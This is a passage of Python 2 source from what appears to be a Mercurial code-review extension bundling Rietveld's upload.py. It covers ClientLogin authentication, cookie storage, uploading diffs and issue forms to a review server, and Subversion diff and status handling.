kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
global rpc
if rpc == None:
rpc = GetRpcServer(upload_options)
self = rpc
if not self.authenticated and force_auth:
self._Authenticate()
if request_path is None:
return
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401:
self._Authenticate()
elif e.code == 302:
loc = e.info()["location"]
if not loc.startswith('https://www.google.com/a') or loc.find('/ServiceLogin') < 0:
return ''
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
def GetForm(url):
f = FormParser()
f.feed(MySend(url))
f.close()
for k,v in f.map.items():
f.map[k] = v.replace("\r\n", "\n");
return f.map
# Fetch the settings for the CL, like reviewer and CC list, by
# scraping the Rietveld editing forms.
def GetSettings(issue):
# The /issue/edit page has everything but only the
# CL owner is allowed to fetch it (and submit it).
f = None
try:
f = GetForm("/" + issue + "/edit")
except:
pass
if not f or 'reviewers' not in f:
# Maybe we're not the CL owner. Fall back to the
# /publish page, which has the reviewer and CC lists,
# and then fetch the description separately.
f = GetForm("/" + issue + "/publish")
f['description'] = MySend("/"+issue+"/description", force_auth=False)
return f
def CreateIssue(subject, desc):
form_fields = [
("content_upload", "1"),
# ("user", upload_options.email),
("reviewers", ''),
("cc", ''),
("description", desc),
("base_hashes", ""),
("subject", subject),
]
uploaded_diff_file = [
("data", "data.diff", emptydiff),
]
ctype, body = EncodeMultipartFormData(form_fields, uploaded_diff_file)
response = MySend("/upload", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error creating issue:\n" + response
sys.exit(2)
def EditDesc(issue, subject=None, desc=None, reviewers=None, cc=None, closed=None):
form_fields = GetForm("/" + issue + "/edit")
if subject is not None:
form_fields['subject'] = subject
if desc is not None:
form_fields['description'] = desc
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if closed is not None:
form_fields['closed'] = closed
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/edit", body, content_type=ctype)
if response != "":
print >>sys.stderr, "Error editing description:\n" + "Sent form: \n", form_fields, "\n", response
sys.exit(2)
def PostMessage1(issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
form_fields = GetForm("/" + issue + "/publish")
if reviewers is not None:
form_fields['reviewers'] = reviewers
if cc is not None:
form_fields['cc'] = cc
if send_mail is not None:
form_fields['send_mail'] = send_mail
if subject is not None:
form_fields['subject'] = subject
form_fields['message'] = message
form_fields['message_only'] = '1'
ctype, body = EncodeMultipartFormData(form_fields.items(), [])
response = MySend("/" + issue + "/publish", body, content_type=ctype)
if response != "":
print response
sys.exit(2)
def PostMessage(issue, message, reviewers=None, cc=None, send_mail=None, subject=None):
# When Rietveld is busy, it seems to throw off a lot of HTTP Error 500: Internal Server Error.
# Rather than abort, sleep and try again.
# Even if the second time fails, let the overall hg command keep going.
try:
PostMessage1(issue, message, reviewers, cc, send_mail, subject)
return
except:
pass
ui.warn("error posting to "+server+" log; sleep 2 and try again.")
os.sleep(2)
try:
PostMessage1(issue, message, reviewers, cc, send_mail, subject)
return
except:
pass
ui.warn("error posting to "+server+" twice; log not updated.")
class opt(object):
pass
def RietveldSetup(ui, repo):
global upload_options, rpc, server, server_url_base, force_google_account, verbosity
# TODO(rsc): If the repository config has no codereview section,
# do not enable the extension. This allows users to
# put the extension in their global .hgrc but only
# enable it for some repositories.
# if not ui.has_section("codereview"):
# cmdtable = {}
# return
if not ui.verbose:
verbosity = 0
# Config options.
x = ui.config("codereview", "server")
if x is not None:
server = x
# TODO(rsc): Take from ui.username?
email = None
x = ui.config("codereview", "email")
if x is not None:
email = x
cc = None
x = ui.config("codereview", "cc")
if x is not None:
cc = x
server_url_base = "http://" + server + "/"
testing = ui.config("codereview", "testing")
force_google_account = ui.configbool("codereview", "force_google_account", False)
upload_options = opt()
upload_options.email = email
upload_options.host = None
upload_options.verbose = 0
upload_options.description = None
upload_options.description_file = None
upload_options.reviewers = None
upload_options.cc = cc
upload_options.message = None
upload_options.issue = None
upload_options.download_base = False
upload_options.revision = None
upload_options.send_mail = False
upload_options.vcs = None
upload_options.server = server
upload_options.save_cookies = True
if testing:
upload_options.save_cookies = False
upload_options.email = "test@example.com"
rpc = None
#######################################################################
# We keep a full copy of upload.py here to avoid import path hell.
# It would be nice if hg added the hg repository root
# to the default PYTHONPATH.
# Edit .+2,<hget http://codereview.appspot.com/static/upload.py
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool for uploading diffs from a version control system to the codereview app.
Usage summary: upload.py [options] [-- diff_options]
Diff options are passed to the diff command of the underlying system.
Supported version control systems:
Git
Mercurial
Subversion
It is important for Git/Mercurial users to specify a tree/node/branch to diff
against by using the '--rev' option.
"""
# This code is derived from appcfg.py in the App Engine SDK (open source),
# and from ASPN recipe #146306.
import cookielib
import getpass
import logging
import mimetypes
import optparse
import os
import re
import socket
import subprocess
import sys
import urllib
import urllib2
import urlparse
# The md5 module was deprecated in Python 2.5.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
import readline
except ImportError:
pass
# The logging verbosity:
# 0: Errors only.
# 1: Status messages.
# 2: Info logs.
# 3: Debug logs.
verbosity = 1
# Max size of patch or base file.
MAX_UPLOAD_SIZE = 900 * 1024
# Constants for version control names. Used by GuessVCSName.
VCS_GIT = "Git"
VCS_MERCURIAL = "Mercurial"
VCS_SUBVERSION = "Subversion"
VCS_UNKNOWN = "Unknown"
# whitelist for non-binary filetypes which do not start with "text/"
# .mm (Objective-C) shows up as application/x-freemind on my Linux box.
TEXT_MIMETYPES = ['application/javascript', 'application/x-javascript',
'application/x-freemind']
VCS_ABBREVIATIONS = {
VCS_MERCURIAL.lower(): VCS_MERCURIAL,
"hg": VCS_MERCURIAL,
VCS_SUBVERSION.lower(): VCS_SUBVERSION,
"svn": VCS_SUBVERSION,
VCS_GIT.lower(): VCS_GIT,
}
def GetEmail(prompt):
"""Prompts the user for their email address and returns it.
The last used email address is saved to a file and offered up as a suggestion
to the user. If the user presses enter without typing in anything the last
used email address is used. If the user enters a new address, it is saved
for next time we prompt.
"""
last_email_file_name = os.path.expanduser("~/.last_codereview_email_address")
last_email = ""
if os.path.exists(last_email_file_name):
try:
last_email_file = open(last_email_file_name, "r")
last_email = last_email_file.readline().strip("\n")
last_email_file.close()
prompt += " [%s]" % last_email
except IOError, e:
pass
email = raw_input(prompt + ": ").strip()
if email:
try:
last_email_file = open(last_email_file_name, "w")
last_email_file.write(email)
last_email_file.close()
except IOError, e:
pass
else:
email = last_email
return email
def StatusUpdate(msg):
"""Print a status message to stdout.
If 'verbosity' is greater than 0, print the message.
Args:
msg: The string to print.
"""
if verbosity > 0:
print msg
def ErrorExit(msg):
"""Print an error message to stderr and exit."""
print >>sys.stderr, msg
sys.exit(1)
class ClientLoginError(urllib2.HTTPError):
"""Raised to indicate there was an error authenticating with ClientLogin."""
def __init__(self, url, code, msg, headers, args):
urllib2.HTTPError.__init__(self, url, code, msg, headers, None)
self.args = args
self.reason = args["Error"]
class AbstractRpcServer(object):
"""Provides a common interface for a simple RPC server."""
def __init__(self, host, auth_function, host_override=None, extra_headers={},
save_cookies=False):
"""Creates a new HttpRpcServer.
Args:
host: The host to send requests to.
auth_function: A function that takes no arguments and returns an
(email, password) tuple when called. Will be called if authentication
is required.
host_override: The host header to send to the server (defaults to host).
extra_headers: A dict of extra headers to append to every request.
save_cookies: If True, save the authentication cookies to local disk.
If False, use an in-memory cookiejar instead. Subclasses must
implement this functionality. Defaults to False.
"""
self.host = host
self.host_override = host_override
self.auth_function = auth_function
self.authenticated = False
self.extra_headers = extra_headers
self.save_cookies = save_cookies
self.opener = self._GetOpener()
if self.host_override:
logging.info("Server: %s; Host: %s", self.host, self.host_override)
else:
logging.info("Server: %s", self.host)
def _GetOpener(self):
"""Returns an OpenerDirector for making HTTP requests.
Returns:
A urllib2.OpenerDirector object.
"""
raise NotImplementedError()
def _CreateRequest(self, url, data=None):
"""Creates a new urllib request."""
logging.debug("Creating request for: '%s' with payload:\n%s", url, data)
req = urllib2.Request(url, data=data)
if self.host_override:
req.add_header("Host", self.host_override)
for key, value in self.extra_headers.iteritems():
req.add_header(key, value)
return req
def _GetAuthToken(self, email, password):
"""Uses ClientLogin to authenticate the user, returning an auth token.
Args:
email: The user's email address
password: The user's password
Raises:
ClientLoginError: If there was an error authenticating with ClientLogin.
HTTPError: If there was some other form of HTTP error.
Returns:
The authentication token returned by ClientLogin.
"""
account_type = "GOOGLE"
if self.host.endswith(".google.com") and not force_google_account:
# Needed for use inside Google.
account_type = "HOSTED"
req = self._CreateRequest(
url="https://www.google.com/accounts/ClientLogin",
data=urllib.urlencode({
"Email": email,
"Passwd": password,
"service": "ah",
"source": "rietveld-codereview-upload",
"accountType": account_type,
}),
)
try:
response = self.opener.open(req)
response_body = response.read()
response_dict = dict(x.split("=")
for x in response_body.split("\n") if x)
return response_dict["Auth"]
except urllib2.HTTPError, e:
if e.code == 403:
body = e.read()
response_dict = dict(x.split("=", 1) for x in body.split("\n") if x)
raise ClientLoginError(req.get_full_url(), e.code, e.msg,
e.headers, response_dict)
else:
raise
def _GetAuthCookie(self, auth_token):
"""Fetches authentication cookies for an authentication token.
Args:
auth_token: The authentication token returned by ClientLogin.
Raises:
HTTPError: If there was an error fetching the authentication cookies.
"""
# This is a dummy value to allow us to identify when we're successful.
continue_location = "http://localhost/"
args = {"continue": continue_location, "auth": auth_token}
req = self._CreateRequest("http://%s/_ah/login?%s" %
(self.host, urllib.urlencode(args)))
try:
response = self.opener.open(req)
except urllib2.HTTPError, e:
response = e
if (response.code != 302 or
response.info()["location"] != continue_location):
raise urllib2.HTTPError(req.get_full_url(), response.code, response.msg,
response.headers, response.fp)
self.authenticated = True
def _Authenticate(self):
"""Authenticates the user.
The authentication process works as follows:
1) We get a username and password from the user
2) We use ClientLogin to obtain an AUTH token for the user
(see http://code.google.com/apis/accounts/AuthForInstalledApps.html).
3) We pass the auth token to /_ah/login on the server to obtain an
authentication cookie. If login was successful, it tries to redirect
us to the URL we provided.
If we attempt to access the upload API without first obtaining an
authentication cookie, it returns a 401 response (or a 302) and
directs us to authenticate ourselves with ClientLogin.
"""
for i in range(3):
credentials = self.auth_function()
try:
auth_token = self._GetAuthToken(credentials[0], credentials[1])
except ClientLoginError, e:
if e.reason == "BadAuthentication":
print >>sys.stderr, "Invalid username or password."
continue
if e.reason == "CaptchaRequired":
print >>sys.stderr, (
"Please go to\n"
"https://www.google.com/accounts/DisplayUnlockCaptcha\n"
"and verify you are a human. Then try again.")
break
if e.reason == "NotVerified":
print >>sys.stderr, "Account not verified."
break
if e.reason == "TermsNotAgreed":
print >>sys.stderr, "User has not agreed to TOS."
break
if e.reason == "AccountDeleted":
print >>sys.stderr, "The user account has been deleted."
break
if e.reason == "AccountDisabled":
print >>sys.stderr, "The user account has been disabled."
break
if e.reason == "ServiceDisabled":
print >>sys.stderr, ("The user's access to the service has been "
"disabled.")
break
if e.reason == "ServiceUnavailable":
print >>sys.stderr, "The service is not available; try again later."
break
raise
self._GetAuthCookie(auth_token)
return
def Send(self, request_path, payload=None,
content_type="application/octet-stream",
timeout=None,
**kwargs):
"""Sends an RPC and returns the response.
Args:
request_path: The path to send the request to, eg /api/appversion/create.
payload: The body of the request, or None to send an empty request.
content_type: The Content-Type header to use.
timeout: timeout in seconds; default None i.e. no timeout.
(Note: for large requests on OS X, the timeout doesn't work right.)
kwargs: Any keyword arguments are converted into query string parameters.
Returns:
The response body, as a string.
"""
# TODO: Don't require authentication. Let the server say
# whether it is necessary.
if not self.authenticated:
self._Authenticate()
old_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(timeout)
try:
tries = 0
while True:
tries += 1
args = dict(kwargs)
url = "http://%s%s" % (self.host, request_path)
if args:
url += "?" + urllib.urlencode(args)
req = self._CreateRequest(url=url, data=payload)
req.add_header("Content-Type", content_type)
try:
f = self.opener.open(req)
response = f.read()
f.close()
return response
except urllib2.HTTPError, e:
if tries > 3:
raise
elif e.code == 401 or e.code == 302:
self._Authenticate()
else:
raise
finally:
socket.setdefaulttimeout(old_timeout)
class HttpRpcServer(AbstractRpcServer):
"""Provides a simplified RPC-style interface for HTTP requests."""
def _Authenticate(self):
"""Save the cookie jar after authentication."""
super(HttpRpcServer, self)._Authenticate()
if self.save_cookies:
StatusUpdate("Saving authentication cookies to %s" % self.cookie_file)
self.cookie_jar.save()
def _GetOpener(self):
"""Returns an OpenerDirector that supports cookies and ignores redirects.
Returns:
A urllib2.OpenerDirector object.
"""
opener = urllib2.OpenerDirector()
opener.add_handler(urllib2.ProxyHandler())
opener.add_handler(urllib2.UnknownHandler())
opener.add_handler(urllib2.HTTPHandler())
opener.add_handler(urllib2.HTTPDefaultErrorHandler())
opener.add_handler(urllib2.HTTPSHandler())
opener.add_handler(urllib2.HTTPErrorProcessor())
if self.save_cookies:
self.cookie_file = os.path.expanduser("~/.codereview_upload_cookies_" + server)
self.cookie_jar = cookielib.MozillaCookieJar(self.cookie_file)
if os.path.exists(self.cookie_file):
try:
self.cookie_jar.load()
self.authenticated = True
StatusUpdate("Loaded authentication cookies from %s" %
self.cookie_file)
except (cookielib.LoadError, IOError):
# Failed to load cookies - just ignore them.
pass
else:
# Create an empty cookie file with mode 600
fd = os.open(self.cookie_file, os.O_CREAT, 0600)
os.close(fd)
# Always chmod the cookie file
os.chmod(self.cookie_file, 0600)
else:
# Don't save cookies across runs of update.py.
self.cookie_jar = cookielib.CookieJar()
opener.add_handler(urllib2.HTTPCookieProcessor(self.cookie_jar))
return opener
parser = optparse.OptionParser(usage="%prog [options] [-- diff_options]")
parser.add_option("-y", "--assume_yes", action="store_true",
dest="assume_yes", default=False,
help="Assume that the answer to yes/no questions is 'yes'.")
# Logging
group = parser.add_option_group("Logging options")
group.add_option("-q", "--quiet", action="store_const", const=0,
dest="verbose", help="Print errors only.")
group.add_option("-v", "--verbose", action="store_const", const=2,
dest="verbose", default=1,
help="Print info level logs (default).")
group.add_option("--noisy", action="store_const", const=3,
dest="verbose", help="Print all logs.")
# Review server
group = parser.add_option_group("Review server options")
group.add_option("-s", "--server", action="store", dest="server",
default="codereview.appspot.com",
metavar="SERVER",
help=("The server to upload to. The format is host[:port]. "
"Defaults to '%default'."))
group.add_option("-e", "--email", action="store", dest="email",
metavar="EMAIL", default=None,
help="The username to use. Will prompt if omitted.")
group.add_option("-H", "--host", action="store", dest="host",
metavar="HOST", default=None,
help="Overrides the Host header sent with all RPCs.")
group.add_option("--no_cookies", action="store_false",
dest="save_cookies", default=True,
help="Do not save authentication cookies to local disk.")
# Issue
group = parser.add_option_group("Issue options")
group.add_option("-d", "--description", action="store", dest="description",
metavar="DESCRIPTION", default=None,
help="Optional description when creating an issue.")
group.add_option("-f", "--description_file", action="store",
dest="description_file", metavar="DESCRIPTION_FILE",
default=None,
help="Optional path of a file that contains "
"the description when creating an issue.")
group.add_option("-r", "--reviewers", action="store", dest="reviewers",
metavar="REVIEWERS", default=None,
help="Add reviewers (comma separated email addresses).")
group.add_option("--cc", action="store", dest="cc",
metavar="CC", default=None,
help="Add CC (comma separated email addresses).")
group.add_option("--private", action="store_true", dest="private",
default=False,
help="Make the issue restricted to reviewers and those CCed")
# Upload options
group = parser.add_option_group("Patch options")
group.add_option("-m", "--message", action="store", dest="message",
metavar="MESSAGE", default=None,
help="A message to identify the patch. "
"Will prompt if omitted.")
group.add_option("-i", "--issue", type="int", action="store",
metavar="ISSUE", default=None,
help="Issue number to which to add. Defaults to new issue.")
group.add_option("--download_base", action="store_true",
dest="download_base", default=False,
help="Base files will be downloaded by the server "
"(side-by-side diffs may not work on files with CRs).")
group.add_option("--rev", action="store", dest="revision",
metavar="REV", default=None,
help="Branch/tree/revision to diff against (used by DVCS).")
group.add_option("--send_mail", action="store_true",
dest="send_mail", default=False,
help="Send notification email to reviewers.")
group.add_option("--vcs", action="store", dest="vcs",
metavar="VCS", default=None,
help=("Version control system (optional, usually upload.py "
"already guesses the right VCS)."))
def GetRpcServer(options):
"""Returns an instance of an AbstractRpcServer.
Returns:
A new AbstractRpcServer, on which RPC calls can be made.
"""
rpc_server_class = HttpRpcServer
def GetUserCredentials():
"""Prompts the user for a username and password."""
email = options.email
if email is None:
email = GetEmail("Email (login for uploading to %s)" % options.server)
password = getpass.getpass("Password for %s: " % email)
return (email, password)
# If this is the dev_appserver, use fake authentication.
host = (options.host or options.server).lower()
if host == "localhost" or host.startswith("localhost:"):
email = options.email
if email is None:
email = "test@example.com"
logging.info("Using debug user %s. Override with --email" % email)
server = rpc_server_class(
options.server,
lambda: (email, "password"),
host_override=options.host,
extra_headers={"Cookie":
'dev_appserver_login="%s:False"' % email},
save_cookies=options.save_cookies)
# Don't try to talk to ClientLogin.
server.authenticated = True
return server
return rpc_server_class(options.server, GetUserCredentials,
host_override=options.host,
save_cookies=options.save_cookies)
def EncodeMultipartFormData(fields, files):
"""Encode form fields for multipart/form-data.
Args:
fields: A sequence of (name, value) elements for regular form fields.
files: A sequence of (name, filename, value) elements for data to be
uploaded as files.
Returns:
(content_type, body) ready for httplib.HTTP instance.
Source:
http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
"""
BOUNDARY = '-M-A-G-I-C---B-O-U-N-D-A-R-Y-'
CRLF = '\r\n'
lines = []
for (key, value) in fields:
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"' % key)
lines.append('')
if type(value) == unicode:
value = value.encode("utf-8")
lines.append(value)
for (key, filename, value) in files:
if type(filename) == unicode:
filename = filename.encode("utf-8")
if type(value) == unicode:
value = value.encode("utf-8")
lines.append('--' + BOUNDARY)
lines.append('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename))
lines.append('Content-Type: %s' % GetContentType(filename))
lines.append('')
lines.append(value)
lines.append('--' + BOUNDARY + '--')
lines.append('')
body = CRLF.join(lines)
content_type = 'multipart/form-data; boundary=%s' % BOUNDARY
return content_type, body
def GetContentType(filename):
"""Helper to guess the content-type from the filename."""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
# Use a shell for subcommands on Windows to get a PATH search.
use_shell = sys.platform.startswith("win")
def RunShellWithReturnCode(command, print_output=False,
universal_newlines=True,
env=os.environ):
"""Executes a command and returns the output from stdout and the return code.
Args:
command: Command to execute.
print_output: If True, the output is printed to stdout.
If False, both stdout and stderr are ignored.
universal_newlines: Use universal_newlines flag (default: True).
Returns:
Tuple (output, return code)
"""
logging.info("Running %s", command)
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=use_shell, universal_newlines=universal_newlines,
env=env)
if print_output:
output_array = []
while True:
line = p.stdout.readline()
if not line:
break
print line.strip("\n")
output_array.append(line)
output = "".join(output_array)
else:
output = p.stdout.read()
p.wait()
errout = p.stderr.read()
if print_output and errout:
print >>sys.stderr, errout
p.stdout.close()
p.stderr.close()
return output, p.returncode
def RunShell(command, silent_ok=False, universal_newlines=True,
print_output=False, env=os.environ):
data, retcode = RunShellWithReturnCode(command, print_output,
universal_newlines, env)
if retcode:
ErrorExit("Got error status from %s:\n%s" % (command, data))
if not silent_ok and not data:
ErrorExit("No output from %s" % command)
return data
class VersionControlSystem(object):
"""Abstract base class providing an interface to the VCS."""
def __init__(self, options):
"""Constructor.
Args:
options: Command line options.
"""
self.options = options
def GenerateDiff(self, args):
"""Return the current diff as a string.
Args:
args: Extra arguments to pass to the diff command.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetUnknownFiles(self):
"""Return a list of files unknown to the VCS."""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def CheckForUnknownFiles(self):
"""Show an "are you sure?" prompt if there are unknown files."""
unknown_files = self.GetUnknownFiles()
if unknown_files:
print "The following files are not added to version control:"
for line in unknown_files:
print line
prompt = "Are you sure to continue?(y/N) "
answer = raw_input(prompt).strip()
if answer != "y":
ErrorExit("User aborted")
def GetBaseFile(self, filename):
"""Get the content of the upstream version of a file.
Returns:
A tuple (base_content, new_content, is_binary, status)
base_content: The contents of the base file.
new_content: For text files, this is empty. For binary files, this is
the contents of the new file, since the diff output won't contain
information to reconstruct the current file.
is_binary: True iff the file is binary.
status: The status of the file.
"""
raise NotImplementedError(
"abstract method -- subclass %s must override" % self.__class__)
def GetBaseFiles(self, diff):
"""Helper that calls GetBase file for each file in the patch.
Returns:
A dictionary that maps from filename to GetBaseFile's tuple. Filenames
are retrieved based on lines that start with "Index:" or
"Property changes on:".
"""
files = {}
for line in diff.splitlines(True):
if line.startswith('Index:') or line.startswith('Property changes on:'):
unused, filename = line.split(':', 1)
# On Windows if a file has property changes its filename uses '\'
# instead of '/'.
filename = filename.strip().replace('\\', '/')
files[filename] = self.GetBaseFile(filename)
return files
def UploadBaseFiles(self, issue, rpc_server, patch_list, patchset, options,
files):
"""Uploads the base files (and if necessary, the current ones as well)."""
def UploadFile(filename, file_id, content, is_binary, status, is_base):
"""Uploads a file to the server."""
file_too_large = False
if is_base:
type = "base"
else:
type = "current"
if len(content) > MAX_UPLOAD_SIZE:
print ("Not uploading the %s file for %s because it's too large." %
(type, filename))
file_too_large = True
content = ""
checksum = md5(content).hexdigest()
if options.verbose > 0 and not file_too_large:
print "Uploading %s file for %s" % (type, filename)
url = "/%d/upload_content/%d/%d" % (int(issue), int(patchset), file_id)
form_fields = [("filename", filename),
("status", status),
("checksum", checksum),
("is_binary", str(is_binary)),
("is_current", str(not is_base)),
]
if file_too_large:
form_fields.append(("file_too_large", "1"))
if options.email:
form_fields.append(("user", options.email))
ctype, body = EncodeMultipartFormData(form_fields,
[("data", filename, content)])
response_body = rpc_server.Send(url, body,
content_type=ctype)
if not response_body.startswith("OK"):
StatusUpdate(" --> %s" % response_body)
sys.exit(1)
patches = dict()
[patches.setdefault(v, k) for k, v in patch_list]
for filename in patches.keys():
base_content, new_content, is_binary, status = files[filename]
file_id_str = patches.get(filename)
if file_id_str.find("nobase") != -1:
base_content = None
file_id_str = file_id_str[file_id_str.rfind("_") + 1:]
file_id = int(file_id_str)
if base_content != None:
UploadFile(filename, file_id, base_content, is_binary, status, True)
if new_content != None:
UploadFile(filename, file_id, new_content, is_binary, status, False)
def IsImage(self, filename):
"""Returns true if the filename has an image extension."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False
return mimetype.startswith("image/")
def IsBinary(self, filename):
"""Returns true if the guessed mimetyped isnt't in text group."""
mimetype = mimetypes.guess_type(filename)[0]
if not mimetype:
return False # e.g. README, "real" binaries usually have an extension
# special case for text files which don't start with text/
if mimetype in TEXT_MIMETYPES:
return False
return not mimetype.startswith("text/")
class SubversionVCS(VersionControlSystem):
"""Implementation of the VersionControlSystem interface for Subversion."""
def __init__(self, options):
super(SubversionVCS, self).__init__(options)
if self.options.revision:
match = re.match(r"(\d+)(:(\d+))?", self.options.revision)
if not match:
ErrorExit("Invalid Subversion revision %s." % self.options.revision)
self.rev_start = match.group(1)
self.rev_end = match.group(3)
else:
self.rev_start = self.rev_end = None
# Cache output from "svn list -r REVNO dirname".
# Keys: dirname, Values: 2-tuple (ouput for start rev and end rev).
self.svnls_cache = {}
# SVN base URL is required to fetch files deleted in an older revision.
# Result is cached to not guess it over and over again in GetBaseFile().
required = self.options.download_base or self.options.revision is not None
self.svn_base = self._GuessBase(required)
def GuessBase(self, required):
"""Wrapper for _GuessBase."""
return self.svn_base
def _GuessBase(self, required):
"""Returns the SVN base URL.
Args:
required: If true, exits if the url can't be guessed, otherwise None is
returned.
"""
info = RunShell(["svn", "info"])
for line in info.splitlines():
words = line.split()
if len(words) == 2 and words[0] == "URL:":
url = words[1]
scheme, netloc, path, params, query, fragment = urlparse.urlparse(url)
username, netloc = urllib.splituser(netloc)
if username:
logging.info("Removed username from base URL")
if netloc.endswith("svn.python.org"):
if netloc == "svn.python.org":
if path.startswith("/projects/"):
path = path[9:]
elif netloc != "pythondev@svn.python.org":
ErrorExit("Unrecognized Python URL: %s" % url)
base = "http://svn.python.org/view/*checkout*%s/" % path
logging.info("Guessed Python base = %s", base)
elif netloc.endswith("svn.collab.net"):
if path.startswith("/repos/"):
path = path[6:]
base = "http://svn.collab.net/viewvc/*checkout*%s/" % path
logging.info("Guessed CollabNet base = %s", base)
elif netloc.endswith(".googlecode.com"):
path = path + "/"
base = urlparse.urlunparse(("http", netloc, path, params,
query, fragment))
logging.info("Guessed Google Code base = %s", base)
else:
path = path + "/"
base = urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
logging.info("Guessed base = %s", base)
return base
if required:
ErrorExit("Can't find URL in output from svn info")
return None
def GenerateDiff(self, args):
cmd = ["svn", "diff"]
if self.options.revision:
cmd += ["-r", self.options.revision]
cmd.extend(args)
data = RunShell(cmd)
count = 0
for line in data.splitlines():
if line.startswith("Index:") or line.startswith("Property changes on:"):
count += 1
logging.info(line)
if not count:
ErrorExit("No valid patches found in output from svn diff")
return data
def _CollapseKeywords(self, content, keyword_str):
"""Collapses SVN keywords."""
# svn cat translates keywords but svn diff doesn't. As a result of this
# behavior patching.PatchChunks() fails with a chunk mismatch error.
# This part was originally written by the Review Board development team
# who had the same problem (http://reviews.review-board.org/r/276/).
# Mapping of keywords to known aliases
svn_keywords = {
# Standard keywords
'Date': ['Date', 'LastChangedDate'],
'Revision': ['Revision', 'LastChangedRevision', 'Rev'],
'Author': ['Author', 'LastChangedBy'],
'HeadURL': ['HeadURL', 'URL'],
'Id': ['Id'],
# Aliases
'LastChangedDate': ['LastChangedDate', 'Date'],
'LastChangedRevision': ['LastChangedRevision', 'Rev', 'Revision'],
'LastChangedBy': ['LastChangedBy', 'Author'],
'URL': ['URL', 'HeadURL'],
}
def repl(m):
if m.group(2):
return "$%s::%s$" % (m.group(1), " " * len(m.group(3)))
return "$%s$" % m.group(1)
keywords = [keyword
for name in keyword_str.split(" ")
for keyword in svn_keywords.get(name, [])]
return re.sub(r"\$(%s):(:?)([^\$]+)\$" % '|'.join(keywords), repl, content)
def GetUnknownFiles(self):
status = RunShell(["svn", "status", "--ignore-externals"], silent_ok=True)
unknown_files = []
for line in status.split("\n"):
if line and line[0] == "?":
unknown_files.append(line)
return unknown_files
def ReadFile(self, filename):
"""Returns the contents of a file."""
file = open(filename, 'rb')
result = ""
try:
result = file.read()
finally:
file.close()
return result
def GetStatus(self, filename):
"""Returns the status of a file."""
if not self.options.revision:
status = RunShell(["svn", "status", "--ignore-externals", filename])
if not status:
ErrorExit("svn status returned no output for %s" % filename)
status_lines = status.splitlines()
# If file is in a cl, the output will begin with
# "\n--- Changelist 'cl_name':\n". See
# http://svn.collab.net/repos/svn/trunk/notes/changelist-design.txt
if (len(status_lines) == 3 and
not status_lines[0] and
status_lines[1].startswith("--- Changelist")):
status = status_lines[2]
else:
status = status_lines[0]
# If we have a revision to diff against we need to run "svn list"
# for the old and the new revision and compare the results to get
# the correct status for a file.
else:
dirname, relfilename = os.path.split(filename)
if dirname not in self.svnls_cache:
cmd = ["svn", "list", "-r", self.rev_start, dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to get status for %s." % filename)
old_files = out.splitlines()
args = ["svn", "list"]
if self.rev_end:
args += ["-r", self.rev_end]
cmd = args + [dirname or "."]
out, returncode = RunShellWithReturnCode(cmd)
if returncode:
ErrorExit("Failed to run command %s" % cmd)
self.svnls_cache[dirname] = (old_files, out.splitlines())
old_files, new_files = self.svnls_cache[dirname]
if relfilename in old_files and relfilename not in new_files:
status = "D "
elif relfilename in old_files and relfilename in new_files:
status = "M "
else:
status = "A "
return status
def GetBaseFile(self, filename):
status = self.GetStatus(filename)
base_content = None
new_content = None
# If a file is copied its status will be "A +", which signifies
# "addition-with-history". See "svn st" for more information. We need to
# upload the original file or else diff parsing will fail if the file was
# edited.
if status[0] == "A" and status[3] != "+":
# We'll need to upload the new content if we're adding a binary file
# since diff's output won't contain it.
mimetype = RunShell(["svn", "propget", "svn:mime-type", filename],
silent_ok=True)
base_content = ""
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if is_binary and self.IsImage(filename):
new_content = self.ReadFile(filename)
elif (status[0] in ("M", "D", "R") or
(status[0] == "A" and status[3] == "+") or # Copied file.
(status[0] == " " and status[1] == "M")): # Property change.
args = []
if self.options.revision:
url = "%s/%s@%s" % (self.svn_base, filename, self.rev_start)
else:
# Don't change filename, it's needed later.
url = filename
args += ["-r", "BASE"]
cmd = ["svn"] + args + ["propget", "svn:mime-type", url]
mimetype, returncode = RunShellWithReturnCode(cmd)
if returncode:
# File does not exist in the requested revision.
# Reset mimetype, it contains an error message.
mimetype = ""
get_base = False
is_binary = bool(mimetype) and not mimetype.startswith("text/")
if status[0] == " ":
# Empty base content just to force an upload.
base_content = ""
elif is_binary:
if self.IsImage(filename):
get_base = True
if status[0] == "M":
if not self.rev_end:
new_content = self.ReadFile(filename)
else:
